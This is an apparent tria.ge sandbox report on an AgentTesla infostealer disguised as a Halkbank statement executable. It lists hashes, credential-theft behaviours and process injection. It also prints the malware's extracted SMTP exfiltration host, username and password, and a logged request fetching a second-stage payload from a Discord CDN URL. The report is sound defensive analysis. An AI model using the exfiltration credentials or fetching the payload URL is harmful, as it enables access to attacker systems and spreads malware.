Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

Halkbank_E...29.exe

windows7-x64

10

Halkbank_E...29.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    92s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23/09/2024, 10:50 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Halkbank_Ekstre_20240922_080921_689429.exe

  • Size

    110KB

  • MD5

    c8cea26640b2fa181571afd43c2e4477

  • SHA1

    5b9e511450b327634fcc620814ebf42cb57b0c91

  • SHA256

    261f4e785355cfd784f655fe0fc4a67be3cc18bb09e742b0187cfcc284fa5240

  • SHA512

    20d9aca79e7034fdd1dbd2b785af17f973c0b9a2ab38dd40338dc0217754d2ea1fd6f00ad9d60bf761dc9d8c135acf32ebd9064facc3e0f3dc9790c3cbd00212

  • SSDEEP

    1536:Y48kc/9ORkoOQzhSppeT//142G1Fq9uelIA630VDx:8kE9OuDp21DiqAEVDx

Score
10/10
agentteslacredential_accessdiscoverykeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     smtp
  • Host:
    mail.zqamcx.com
  • Port:
    587
  • Username:
    server1@zqamcx.com
  • Password:
    Anambraeast@
  • Email To:
    server@zqamcx.com

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

    spywarestealer
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Halkbank_Ekstre_20240922_080921_689429.exe
    "C:\Users\Admin\AppData\Local\Temp\Halkbank_Ekstre_20240922_080921_689429.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3592
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      2⤵
        PID:2228
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:3756

    Network

    • flag-us
      DNS
      97.17.167.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      97.17.167.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      cdn.discordapp.com
      Halkbank_Ekstre_20240922_080921_689429.exe
      Remote address:
      8.8.8.8:53
      Request
      cdn.discordapp.com
      IN A
      Response
      cdn.discordapp.com
      IN A
      162.159.135.233
      cdn.discordapp.com
      IN A
      162.159.129.233
      cdn.discordapp.com
      IN A
      162.159.130.233
      cdn.discordapp.com
      IN A
      162.159.134.233
      cdn.discordapp.com
      IN A
      162.159.133.233
    • flag-us
      GET
      https://cdn.discordapp.com/attachments/1265592680700711006/1287684873938800694/kingggggme.txt?ex=66f2717d&is=66f11ffd&hm=b878f34fc0cc8f8f697531b9c9c0248abaa28866b5778986aef88c57292e010a&
      Halkbank_Ekstre_20240922_080921_689429.exe
      Remote address:
      162.159.135.233:443
      Request
      GET /attachments/1265592680700711006/1287684873938800694/kingggggme.txt?ex=66f2717d&is=66f11ffd&hm=b878f34fc0cc8f8f697531b9c9c0248abaa28866b5778986aef88c57292e010a& HTTP/1.1
      Host: cdn.discordapp.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Mon, 23 Sep 2024 10:50:54 GMT
      Content-Type: text/plain; charset=utf-8
      Content-Length: 327008
      Connection: keep-alive
      CF-Ray: 8c79f9fa6acb657a-LHR
      CF-Cache-Status: HIT
      Accept-Ranges: bytes, bytes
      Age: 10252
      Cache-Control: public, max-age=31536000
      Content-Disposition: attachment; filename="kingggggme.txt"
      ETag: "1d67d8fd28fdc38b1606e7bd4c223a9d"
      Expires: Tue, 23 Sep 2025 10:50:54 GMT
      Last-Modified: Mon, 23 Sep 2024 07:59:58 GMT
      Vary: Accept-Encoding
      alt-svc: h3=":443"; ma=86400
      x-goog-generation: 1727078398052007
      x-goog-hash: crc32c=F3gHFg==
      x-goog-hash: md5=HWfY/Sj9w4sWBue9TCI6nQ==
      x-goog-metageneration: 1
      x-goog-storage-class: STANDARD
      x-goog-stored-content-encoding: identity
      x-goog-stored-content-length: 327008
      x-guploader-uploadid: AD-8ljuSgJeARyAKoFDsjKGCmnOLdW0aNJZzRI-XUBfMXltfgMk3zNRc58-0aFwDSDQQW9Hc4x64KlpuOQ
      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
      Set-Cookie: __cf_bm=ryzA49SewVzWDV286kJY8giDpd9I0mPPFZwiKFheuEc-1727088654-1.0.1.1-LYYN2ERS7ejorfrWQoGTa_tTXaiChzg4jR5gQ.nh2KjhEZYOp1yriUQ_HSqcu_GUx5dxdkKr70PWb9pPwKMWjQ; path=/; expires=Mon, 23-Sep-24 11:20:54 GMT; domain=.discordapp.com; HttpOnly; Secure
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B80oVC7ZhyOH%2BIaZKvEBL7BAlZUO6vehSqBZAOruPVJv0Z9LpQKcnyKdXFVe3CWw7U7SQhp%2BDKFbJKArcnt3l%2Bu%2BWyXoXXem47glAlSO6Ji%2FxhWDALsG1Lw8vu3WghCUMbk%2BVg%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Set-Cookie: _cfuvid=9lcmFL1wc_oHSiDQ9FdhBI3tv6ltb4s9eWJwaVneoCM-1727088654532-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
      Server: cloudflare
    • flag-us
      DNS
      25.140.123.92.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      25.140.123.92.in-addr.arpa
      IN PTR
      Response
      25.140.123.92.in-addr.arpa
      IN PTR
      a92-123-140-25deploystaticakamaitechnologiescom
    • flag-us
      DNS
      233.135.159.162.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      233.135.159.162.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      ip-api.com
      RegAsm.exe
      Remote address:
      8.8.8.8:53
      Request
      ip-api.com
      IN A
      Response
      ip-api.com
      IN A
      208.95.112.1
    • flag-us
      GET
      http://ip-api.com/line/?fields=hosting
      RegAsm.exe
      Remote address:
      208.95.112.1:80
      Request
      GET /line/?fields=hosting HTTP/1.1
      Host: ip-api.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Mon, 23 Sep 2024 10:50:56 GMT
      Content-Type: text/plain; charset=utf-8
      Content-Length: 6
      Access-Control-Allow-Origin: *
      X-Ttl: 60
      X-Rl: 44
    • flag-us
      DNS
      1.112.95.208.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      1.112.95.208.in-addr.arpa
      IN PTR
      Response
      1.112.95.208.in-addr.arpa
      IN PTR
      ip-apicom
    • flag-us
      DNS
      50.23.12.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      50.23.12.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      15.164.165.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      15.164.165.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      73.190.18.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      73.190.18.2.in-addr.arpa
      IN PTR
      Response
      73.190.18.2.in-addr.arpa
      IN PTR
      a2-18-190-73deploystaticakamaitechnologiescom
    • flag-us
      DNS
      14.227.111.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      14.227.111.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      172.210.232.199.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      172.210.232.199.in-addr.arpa
      IN PTR
      Response
    • 162.159.135.233:443
      https://cdn.discordapp.com/attachments/1265592680700711006/1287684873938800694/kingggggme.txt?ex=66f2717d&is=66f11ffd&hm=b878f34fc0cc8f8f697531b9c9c0248abaa28866b5778986aef88c57292e010a&
      tls, http
      Halkbank_Ekstre_20240922_080921_689429.exe
      7.3kB
       344.8kB
       147
      261

      HTTP Request

      GET https://cdn.discordapp.com/attachments/1265592680700711006/1287684873938800694/kingggggme.txt?ex=66f2717d&is=66f11ffd&hm=b878f34fc0cc8f8f697531b9c9c0248abaa28866b5778986aef88c57292e010a&

      HTTP Response

      200
    • 208.95.112.1:80
      http://ip-api.com/line/?fields=hosting
      http
      RegAsm.exe
      356 B
       347 B
       6
      4

      HTTP Request

      GET http://ip-api.com/line/?fields=hosting

      HTTP Response

      200
    • 8.8.8.8:53
      97.17.167.52.in-addr.arpa
      dns
      71 B
       145 B
       1
      1

      DNS Request

      97.17.167.52.in-addr.arpa

    • 8.8.8.8:53
      cdn.discordapp.com
      dns
      Halkbank_Ekstre_20240922_080921_689429.exe
      64 B
       144 B
       1
      1

      DNS Request

      cdn.discordapp.com

      DNS Response

      162.159.135.233
      162.159.129.233
      162.159.130.233
      162.159.134.233
      162.159.133.233

    • 8.8.8.8:53
      25.140.123.92.in-addr.arpa
      dns
      72 B
       137 B
       1
      1

      DNS Request

      25.140.123.92.in-addr.arpa

    • 8.8.8.8:53
      233.135.159.162.in-addr.arpa
      dns
      74 B
       136 B
       1
      1

      DNS Request

      233.135.159.162.in-addr.arpa

    • 8.8.8.8:53
      95.221.229.192.in-addr.arpa
      dns
      73 B
       144 B
       1
      1

      DNS Request

      95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      ip-api.com
      dns
      RegAsm.exe
      56 B
       72 B
       1
      1

      DNS Request

      ip-api.com

      DNS Response

      208.95.112.1

    • 8.8.8.8:53
      1.112.95.208.in-addr.arpa
      dns
      71 B
       95 B
       1
      1

      DNS Request

      1.112.95.208.in-addr.arpa

    • 8.8.8.8:53
      50.23.12.20.in-addr.arpa
      dns
      70 B
       156 B
       1
      1

      DNS Request

      50.23.12.20.in-addr.arpa

    • 8.8.8.8:53
      15.164.165.52.in-addr.arpa
      dns
      72 B
       146 B
       1
      1

      DNS Request

      15.164.165.52.in-addr.arpa

    • 8.8.8.8:53
      73.190.18.2.in-addr.arpa
      dns
      70 B
       133 B
       1
      1

      DNS Request

      73.190.18.2.in-addr.arpa

    • 8.8.8.8:53
      14.227.111.52.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      14.227.111.52.in-addr.arpa

    • 8.8.8.8:53
      172.210.232.199.in-addr.arpa
      dns
      74 B
       128 B
       1
      1

      DNS Request

      172.210.232.199.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/3592-5-0x0000000074DB0000-0x0000000075560000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3592-1-0x0000000000050000-0x0000000000074000-memory.dmp

      Filesize

      144KB

      Download

    • memory/3592-2-0x0000000074DB0000-0x0000000075560000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3592-0-0x0000000074DBE000-0x0000000074DBF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/3756-7-0x0000000005760000-0x0000000005D04000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/3756-6-0x0000000074DB0000-0x0000000075560000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3756-3-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

      Download

    • memory/3756-8-0x0000000005130000-0x0000000005196000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3756-9-0x0000000074DB0000-0x0000000075560000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3756-10-0x0000000006560000-0x00000000065B0000-memory.dmp

      Filesize

      320KB

      Download

    • memory/3756-11-0x0000000006650000-0x00000000066E2000-memory.dmp

      Filesize

      584KB

      Download

    • memory/3756-12-0x00000000067F0000-0x00000000067FA000-memory.dmp

      Filesize

      40KB

      Download

    • memory/3756-13-0x0000000074DB0000-0x0000000075560000-memory.dmp

      Filesize

      7.7MB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.